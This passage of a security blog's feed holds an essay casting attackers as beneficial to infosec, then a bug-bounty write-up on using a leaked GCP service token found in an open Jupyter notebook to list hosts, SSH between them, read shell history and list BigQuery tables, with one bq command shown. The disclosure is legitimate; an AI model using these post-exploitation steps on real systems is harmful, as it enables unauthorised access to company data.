font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;\"\u003Ehttps:\/\/quantumstones.com\/what-is-duality-the-doorway-to-all-truths\/\u003C\/span\u003E\u003C\/a\u003E\u003Cspan style=\"font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;\"\u003E \u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-aYWz29hpXyY\/XqcHPKtcRZI\/AAAAAAAACjc\/f7GPFtnN9TsWy6PzXVb2gNLgXFviHgu0wCNcBGAsYHQ\/s1600\/buddha-demon.jpg\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: black; font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cimg border=\"0\" data-original-height=\"313\" data-original-width=\"512\" height=\"195\" src=\"https:\/\/1.bp.blogspot.com\/-aYWz29hpXyY\/XqcHPKtcRZI\/AAAAAAAACjc\/f7GPFtnN9TsWy6PzXVb2gNLgXFviHgu0wCNcBGAsYHQ\/s320\/buddha-demon.jpg\" width=\"320\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; font-size: small;\"\u003EBuddha \u0026amp; The Demon - Perspective\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EExtra Reading on Duality\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Ca href=\"https:\/\/exploringyourmind.com\/jekyll-and-hyde-duality-between-good-evil\/\" style=\"text-decoration-line: none;\"\u003E\u003Cspan style=\"color: black; font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003Ehttps:\/\/exploringyourmind.com\/jekyll-and-hyde-duality-between-good-evil\/\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EI’ll be honest, after a lifetime growing up in the United States worrying about the next foreign country boogeyman and over a decade in the Army where the primary motivation was giving soldiers someone to “hate” it’s been quite a journey to try to see things other than a binary right\/wrong \u0026amp; good\/evil, etc.\u0026nbsp;The intersection and interdependence of good and evil manifested for me (and I think plenty of others) in the following way: we don’t feel we are good unless we are fighting against evil. It’s the American Way! We can feel comfortable and secure in our own goodness only by attacking and destroying the evil outside us.\u0026nbsp;I was, and still am to an extent, looking for evil to vanquish.\u0026nbsp;This interdependence is at the core of Infosec. Without APT groups, criminals, malware, and every other form of virtual boogeyman (aka “the other(s)” or “the bad guys”) most of us have no reason for our Infosec existence.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EThinking of everything as fundamentally neutral has helped me drop some, but not all, of my old vocabulary and has given me space to pause and to think about how I feel about issues at a micro level and macro level.\u0026nbsp;Taking that pause allows me to understand that my perspective on the situation is entirely what matters and that another person could have a TOTALLY different perspective on the situation (and Infosec twitter shows me...quite frequently does).\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003ECriminals, Attackers, Bad People, etc and their actions can have a multitude of perspectives.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003ETake a company that gets compromised so badly they go out of business. From the perspective of the company CEO this is BAD. From another perspective, perhaps of a competing company CEO, this is GOOD, from the perspective of the attacker they got what they wanted so (GOOD) perhaps a bonus is coming, perhaps their family gets to eat or maybe they just get another BTC in their nano ledger. In-house defenders have “failed their mission” and now are out of work or maybe this was the event that finally prompted management to spend that money they’ve been asking for. Perhaps their failures were so embarrassing they have made it by name in tech-crunch articles and their careers may be over or at least paused. Perhaps they “lost” but their response was good enough that the general public thinks things are ok inside the company anyway.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EFor Infosec, I’m going to make the case that attackers are GOOD; at least from my perspective (as every opinion piece is). But, I’ll attempt to lay out bullet points for rationale for my current perspective. The following can be summed as “Growth through struggle”:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EAttackers force defenders to consistently up their game.\u0026nbsp;Attackers constantly innovate to get around the current detection techniques and technologies.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EAttackers force Red Teams to up their game to keep up with their TTPs.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EDefenders force attackers and Red Teams to up their game to keep up with current defenses.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003EWithout virtual cyber boogeymen a \u003C\/span\u003E\u003Ca href=\"https:\/\/cybersecurityventures.com\/cybersecurity-market-report\/\" style=\"white-space: pre;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E100+ billion dollar industry\u003C\/span\u003E\u003C\/a\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E would sell less product and be required to innovate less.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EAttackers force visibility into their politics and perspectives through the investigations into their motivations and TTPs.\u0026nbsp;\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EThey give a large portion of Infosec a “purpose”. I’ve dedicated the last 20 years of my life in various verticals of IT to “keep bad guys out” and I'm positive I'm not alone.\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EIf you’ve made it this far. Thank you! I realize the title is a bit click-baity and not really in line with the idea of duality or perspective but no one would have read “attackers are fundamentally neutral.”\u0026nbsp;Although my hope is that are open to exploring that perspective now. I welcome your thoughts on the subject.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003ECG\u003C\/span\u003E\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/4016695769306652544\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=4016695769306652544","title":"6 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/4016695769306652544"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/4016695769306652544"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2020\/04\/the-duality-of-attackers-or-why-bad.html","title":"The Duality of Attackers - Or Why Bad Guys are a Good Thing™"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-aYWz29hpXyY\/XqcHPKtcRZI\/AAAAAAAACjc\/f7GPFtnN9TsWy6PzXVb2gNLgXFviHgu0wCNcBGAsYHQ\/s72-c\/buddha-demon.jpg","height":"72","width":"72"},"thr$total":{"$t":"6"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2552988186359746960"},"published":{"$t":"2020-03-13T22:10:00.001-04:00"},"updated":{"$t":"2020-03-24T15:56:05.127-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"bugbounty"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"What is your GCP infra worth?...about ~$700 [Bugbounty]"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\nBugBounty story\u0026nbsp;#bugbountytips\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nA fixed but they didn't pay the bugbounty story...\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTimeline:\u003Cbr \/\u003E\n\u003Cul\u003E\n\u003Cli\u003Ereported 21 Oct 2019\u003C\/li\u003E\n\u003Cli\u003Evalidated at Critical\u0026nbsp; 23 Oct 2019\u003C\/li\u003E\n\u003Cli\u003Evalidated as fixed 30 Oct 2019\u003C\/li\u003E\n\u003Cli\u003EBounty amount stated (IDR 10.000.000 = ~700 USD) 12 Nov 2019\u003C\/li\u003E\n\u003Cli\u003EInformation provided for payment 16 Nov 2019\u003C\/li\u003E\n\u003Cli\u003E13 March 2020 - Never paid - blog post posted\u003C\/li\u003E\n\u003Cli\u003E19 March 2020\u0026nbsp; - received bounty of $565.86\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cbr \/\u003E\nThere are lots of applications that are SAAS - \u003Ca href=\"https:\/\/www.youtube.com\/watch?v=JVCsy-T94k4\u0026amp;list=UUef0TWni8ghLcJphdmDBoxw\" target=\"_blank\"\u003EShell as a Service\u003C\/a\u003E. Jupyter Notebook is one of these with its running code feature as well as its terminal functionality.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhile I was trolling shodan looking for vulnerable boxes i came across an open Jupyter notebook belonging to \u003Ca href=\"https:\/\/www.tokopedia.com\/\" target=\"_blank\"\u003ETokopedia\u003C\/a\u003E. This wasn't obvious at first , but it will become clear how I identified this as you check out the screenshots.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-PyPQDLHS_Hw\/XhPS4WQc57I\/AAAAAAAACgs\/Jnuy-lPZJ-4THiXklXIlzrXTc_C_9BamgCNcBGAsYHQ\/s1600\/notebooks-main-page.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"495\" data-original-width=\"1600\" height=\"198\" src=\"https:\/\/1.bp.blogspot.com\/-PyPQDLHS_Hw\/XhPS4WQc57I\/AAAAAAAACgs\/Jnuy-lPZJ-4THiXklXIlzrXTc_C_9BamgCNcBGAsYHQ\/s640\/notebooks-main-page.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EOpen Jupyter notebook server\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\nI did a post on what do do when you find a GCP key in a \u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/i-found-gcp-service-account-tokennow.html\" target=\"_blank\"\u003Eprevious post\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThis is especially important when people leave their GCP service account keys in folders\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-8xZ8-aiZQvQ\/XhPULemf_II\/AAAAAAAACg0\/ggGkT8fqe_4jEcUkPZRJ28sBjeZpEqmhgCNcBGAsYHQ\/s1600\/Screen%2BShot%2B2020-01-06%2Bat%2B7.42.19%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"130\" data-original-width=\"1600\" height=\"50\" src=\"https:\/\/1.bp.blogspot.com\/-8xZ8-aiZQvQ\/XhPULemf_II\/AAAAAAAACg0\/ggGkT8fqe_4jEcUkPZRJ28sBjeZpEqmhgCNcBGAsYHQ\/s640\/Screen%2BShot%2B2020-01-06%2Bat%2B7.42.19%2BPM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EWhen you leave your service token in the folder for all to find\/use\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\nIn this case it was base64 encoded - but easy to fix\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-KaQ0FMyJNBo\/XhPUpnZ0G7I\/AAAAAAAAChI\/fBpvwxsmLuw0vnNVHL0wtmec8HPb1I6LwCNcBGAsYHQ\/s1600\/token-b64decode.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1440\" data-original-width=\"1318\" height=\"320\" src=\"https:\/\/1.bp.blogspot.com\/-KaQ0FMyJNBo\/XhPUpnZ0G7I\/AAAAAAAAChI\/fBpvwxsmLuw0vnNVHL0wtmec8HPb1I6LwCNcBGAsYHQ\/s320\/token-b64decode.png\" width=\"292\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003Eservice account token b64 decoded\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\nIt was also in the error output of one of the jupyter notebooks\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-HmECxp1X3dY\/XhPVx5CwsiI\/AAAAAAAACho\/tDMBetuxSccBLCA5itWw__i3A05qzkvygCNcBGAsYHQ\/s1600\/creds-via-notebook-error.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"635\" data-original-width=\"1600\" height=\"254\" src=\"https:\/\/1.bp.blogspot.com\/-HmECxp1X3dY\/XhPVx5CwsiI\/AAAAAAAACho\/tDMBetuxSccBLCA5itWw__i3A05qzkvygCNcBGAsYHQ\/s640\/creds-via-notebook-error.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nI had used the terminal to do some basic poking around to find the owner\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-S0byZPXsyRY\/XhPVXnDr1OI\/AAAAAAAAChU\/mqvigYYYmy0lr932TI99nWjMyGwjkQg4wCNcBGAsYHQ\/s1600\/uname-a-tokepedia-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"283\" data-original-width=\"1600\" height=\"112\" src=\"https:\/\/1.bp.blogspot.com\/-S0byZPXsyRY\/XhPVXnDr1OI\/AAAAAAAAChU\/mqvigYYYmy0lr932TI99nWjMyGwjkQg4wCNcBGAsYHQ\/s640\/uname-a-tokepedia-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-g9NGSnZlbuE\/XhPVXqj6Y6I\/AAAAAAAAChY\/wU54BXeCy3MzSjAmi6wyVldlnWB0gYulQCEwYBhgL\/s1600\/creds-via-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1022\" data-original-width=\"1600\" height=\"408\" src=\"https:\/\/1.bp.blogspot.com\/-g9NGSnZlbuE\/XhPVXqj6Y6I\/AAAAAAAAChY\/wU54BXeCy3MzSjAmi6wyVldlnWB0gYulQCEwYBhgL\/s640\/creds-via-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan id=\"goog_513689851\"\u003E\u003C\/span\u003E\u003Cspan id=\"goog_513689852\"\u003E\u003C\/span\u003E\u003Cbr \/\u003E\nOnce I identified it was owned by someone with a bug bounty program I figured it was ok to prove access and impact.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nPer the GCP blog post once you have the service account token you authenticate and interact with services your token has access to\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-KGxrAbgkprs\/XhPWQhyeHfI\/AAAAAAAAChw\/ACTd035IuIwQppKZL4JLVxtfr3ybRYIKgCNcBGAsYHQ\/s1600\/tokepedia-gcp-compute-list.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"269\" data-original-width=\"1600\" height=\"106\" src=\"https:\/\/1.bp.blogspot.com\/-KGxrAbgkprs\/XhPWQhyeHfI\/AAAAAAAAChw\/ACTd035IuIwQppKZL4JLVxtfr3ybRYIKgCNcBGAsYHQ\/s640\/tokepedia-gcp-compute-list.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nThe handy thing about getting a shell on a GCP compute host is that all the GCP utils are installed and \"just work\" I actually didn't need to do anything from an external host I was able to start ssh'ing to other hosts from within the jupyter terminal.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-xta4kDx27nQ\/XhPWxntA99I\/AAAAAAAACh8\/lVF8DO_QrXASX6AbCmsMK_fMjHCRsE-gACNcBGAsYHQ\/s1600\/ssh%2Bto%2Bseonper-1-from-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"952\" data-original-width=\"1600\" height=\"380\" src=\"https:\/\/1.bp.blogspot.com\/-xta4kDx27nQ\/XhPWxntA99I\/AAAAAAAACh8\/lVF8DO_QrXASX6AbCmsMK_fMjHCRsE-gACNcBGAsYHQ\/s640\/ssh%2Bto%2Bseonper-1-from-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-kQXjOoflwR4\/XhPW7Y3vcCI\/AAAAAAAACiA\/X-9Jnh98YjwAKFGhhX5_zgE9Zz8orDQPwCNcBGAsYHQ\/s1600\/ssh%2Bto%2Bseonper-1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"552\" data-original-width=\"1590\" height=\"222\" src=\"https:\/\/1.bp.blogspot.com\/-kQXjOoflwR4\/XhPW7Y3vcCI\/AAAAAAAACiA\/X-9Jnh98YjwAKFGhhX5_zgE9Zz8orDQPwCNcBGAsYHQ\/s640\/ssh%2Bto%2Bseonper-1.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-_SS8MHWNDhs\/XhPXAFspivI\/AAAAAAAACiE\/BDj1qkfbJjcMyJlC3493an9DeS_HeOMIwCNcBGAsYHQ\/s1600\/ssh-abe-mf-1-from-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"968\" data-original-width=\"1600\" height=\"386\" src=\"https:\/\/1.bp.blogspot.com\/-_SS8MHWNDhs\/XhPXAFspivI\/AAAAAAAACiE\/BDj1qkfbJjcMyJlC3493an9DeS_HeOMIwCNcBGAsYHQ\/s640\/ssh-abe-mf-1-from-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-9d7upCVcit4\/XhPXG3OgilI\/AAAAAAAACiI\/Wg8H9TlaDycH_SbTAECnOvjnE_Pcdw2awCNcBGAsYHQ\/s1600\/cat%2Bbash_history%2Bon%2Bab-md-1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"962\" data-original-width=\"1600\" height=\"384\" src=\"https:\/\/1.bp.blogspot.com\/-9d7upCVcit4\/XhPXG3OgilI\/AAAAAAAACiI\/Wg8H9TlaDycH_SbTAECnOvjnE_Pcdw2awCNcBGAsYHQ\/s640\/cat%2Bbash_history%2Bon%2Bab-md-1.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nBigquery tables o_0\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E[+] Bigquery access [+]\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ebq ls --format=prettyjson --project_id tokopedia-970\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-5FQ_OKvT4c0\/XmxAZ9yddpI\/AAAAAAAACi4\/cjkTWLT2Vq8-flBxAtSulupUf-0OSgOYgCNcBGAsYHQ\/s1600\/Screen%2BShot%2B2020-03-13%2Bat%2B10.23.35%2BPM.png\" imageanchor=\"1\" style=\"clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"724\" data-original-width=\"998\" height=\"232\" src=\"https:\/\/1.bp.blogspot.com\/-5FQ_OKvT4c0\/XmxAZ9yddpI\/AAAAAAAACi4\/cjkTWLT2Vq8-flBxAtSulupUf-0OSgOYgCNcBGAsYHQ\/s320\/Screen%2BShot%2B2020-03-13%2Bat%2B10.23.35%2BPM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EDat billing table yo\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\n\u003Ctable cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca 